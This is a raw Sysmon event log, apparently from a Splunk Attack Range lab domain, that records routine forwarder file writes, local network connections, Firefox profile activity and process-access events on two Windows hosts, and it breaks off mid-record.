354300x80000000000000001053037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:05.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61898-false10.0.1.12-8000- 23542300x80000000000000001053036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:14.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7C3225D2B093FA0BF74D72457A7630B,SHA256=ABB9BBCB576E8A41FE24F9662BBE94860A001757316F77AE11BDB40C40285891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:15.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F982CC6925DFB5CCBB72799C1C8ACC2,SHA256=F101C620F8FAE2416F5E35655D66EA0A9A45F7A0318788627CB48D6741642BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D01919AC68E1B0526B20873E366DD334,SHA256=5C391053AE50C9BC6085E51193D9637E206BE4D77B1B304A070BD1DD58BA3FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:15.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5FC1556FC8A07B9DEA80FA5A3A140F0,SHA256=C407F886689913E5CFB32FC462518617F3168B30BD900A14B7E00143655D499A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.209{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54848- 23542300x80000000000000001053038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.159{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=825ED47587FA1AF45B8C132A1789F2FA,SHA256=922368F75624C120AB27416944065204DEEDF68635704AF757AEFF76F32E138F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:16.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95B83E1DD77BFF6825421F2CC4F69880,SHA256=011AF3A56B04C038271D02F98FEA66FDDE88B63CCD638C620E04A370F6DB70DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.022{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61899-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.022{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61899-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:16.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34448F2733326A06AB59651B8C75354,SHA256=1802C97DF42545491504688C8ADD578CC4A4D0F74CB57BF6B3614881C6C5A07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:17.678{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03797AD3C7F7458046E96538474C0D28,SHA256=4CE269D29EB8DD1DB6E5753CF30F2BDB26217E27BE8E5329CA1A44F1905BA786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:17.192{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20FF6BB1AE620FFE97F16DE01576014,SHA256=2DE3EF04B50A73E19D686EC10E2E65D618F95A269F66EFD3D46594194FE9A751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:18.693{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C16289897FDFFFA9EFF6A90D6127B6,SHA256=FA94CDF96BF639745766B161E9B686016F241250F1EBECC0D3C82083ED8C602F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:18.509{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:18.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B89094D82AF92F8427DE174B3753A420,SHA256=3362ABD0D2D7FC53F0B8A8C63B17F0EE38DC57DC92E3579EFC208667B688EB2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:17.201{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57405-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:19.693{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C3E8581E8B001E04D4A850A1015BF90,SHA256=F6C3AA8A41A8C9F3388AC562FA770465CD3DA374B4016C6CE6E6A81C4C5F16E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:19.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCE10E505E3D3E62168E3AF01DBA1B1,SHA256=235ACF49AB91CE567587279DBD75D6E927117A114C176A5C117E11666B2CFCA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.756{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.693{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0F3D6A9F902D59AD157E732030A1EC,SHA256=54DE15CEFF74FA189D681A666FE19406D2D45805DC5D7B3CAFFE0860F4E37683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:20.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9576549ACE3BA7FC2F0DF291CE63E87D,SHA256=598601F46D395BF4BD3DD486510E032A49886B0F5413FA1D9636900848172C8D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000809531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:03:20.584{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x613784b3) 354300x80000000000000001053049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.720{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61900-false10.0.1.12-8000- 23542300x8000000000000000809534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:21.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CCF591A9D7E23858DA547C8DC692620,SHA256=9B185300113721F7889A87801526EB42A9406F3F93238C444442EEB1CE10E4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F665D75D6B9F505B9AAB63A8B1D33C8C,SHA256=ADC3C1995658CBCAF420A2BDF58844CCBB7FA0FA5914BEF2EE66CF6E0E63D4D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=883FF506EE1EA8982D11B9AA623943CF,SHA256=A523A2ACFB90631A198C8FCB81F684B0BDC81F7BE6AE1F0ACDC73BDDE4A7039D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D82473D50F9E85301B19F630E6949976,SHA256=16F43DEFA233CEBB676637F61DF54CAE160A10396BAC135DFAEF1AF119B1E3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=86098AC3AEE905FB44616B3B72FEF6C8,SHA256=A45540FD5099199F6CD27E1F2B55EEC9609690F9A14DF7A550326A1CA3B91B4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DD285A60052367A37E65D8FB223D2C9,SHA256=92EF053E06614B79CDE26020E3091D913D61F0A3E3C4F8B8D3FE8B25CEDB9140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=856F0D1402684BE7D21A6F545F51B1D8,SHA256=C4B8616FA28E47913ED82089FB23502241F8832DD72F8E992DA082BED42AC73B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBDD9FE28F98BE7F90EF83060D507974,SHA256=C206A41B4024C7F8CC537766F08091B7F185295A08AD42BE1EB8D1C1923BCDD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B77AEFA01AAEE100BEDDE8F53C8F66FC,SHA256=D95EC75990602EA549E86259099ED3945AE39251E88C722C2E000512AF35651D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.191{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1457AE7F2CFED86517EC6D04C6FBF861,SHA256=2012F8A176801EA210D2502E1EA4D0110A00411828EB7799E71FC2CBFA4AEA27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C3D3E8FDAB68E7E8B7E24AB3F450FE24,SHA256=FFFE0FA8B804947E193846CE85D74FD397E59C8FA9F0BE0BFD0AA46FAC5550D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.188{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8582C86CDD825AC8B6566EEBA96408C1,SHA256=6BF029D4A389A7EEACCE9C56BF5BF47FC2D81638A4D0ED7E15164ECC8BAC6969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:21.187{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D404F59DC4EAB38E6A1A870F5859E4D7,SHA256=8F9F3B290EBA1AD49602EA65A4E61CACD78A46D963044CBC894028E4C276A4FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:22.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0641421D57BCA1448A9B9D5B38A86F71,SHA256=82981D11AC7F6BAA121E250B6D088095186AA31E1DEFC7C4D87909669E50C336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:22.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8128C512CE05D028E59BFCBC39A9CB4E,SHA256=E07B348B0A80D22D5D4C9186BD20DEB10DC35A4D7F05B3EF24A7F46F62FD8129,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.888{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57406-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000809535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:20.716{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse169.254.169.123-123ntp 
23542300x8000000000000000809539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:23.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C215A885C52C8479F0C26BAAE61A0DE,SHA256=22A431CD7B35C2079F7A17F38A8534B7A68E32AAEDC5E890E2AC661058097225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=885EA53639B482B89CA8B87293F77C81,SHA256=16D96374D3EB6953615332385FD2CBDF0CB0C61F4B8D3CDF9DEBF53446C8D4E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D01919AC68E1B0526B20873E366DD334,SHA256=5C391053AE50C9BC6085E51193D9637E206BE4D77B1B304A070BD1DD58BA3FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:23.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F612905699B7E09BEB34487D6373B40D,SHA256=B395FDD2E6A2D02CCCB5BB8657B83331DD67A0D2ABF5E7B6E34ABB1D309E5F7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:22.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57407-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D19BC98F4D12392E06B8E2DF3DC6256,SHA256=5663756EEB06B6AF543B1A798C6DDE312BC0DA14822A099B5F2A54A1FD9456B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:24.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=258BA3E9537D35341E449594CB1F9BD1,SHA256=FFCA0C89CBCD25F1B4EB07522B864A78F670850929A6CF65509F8D29BB4E4E47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.601{0C1E0330-F74C-60EB-C079-00000000D001}37802588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 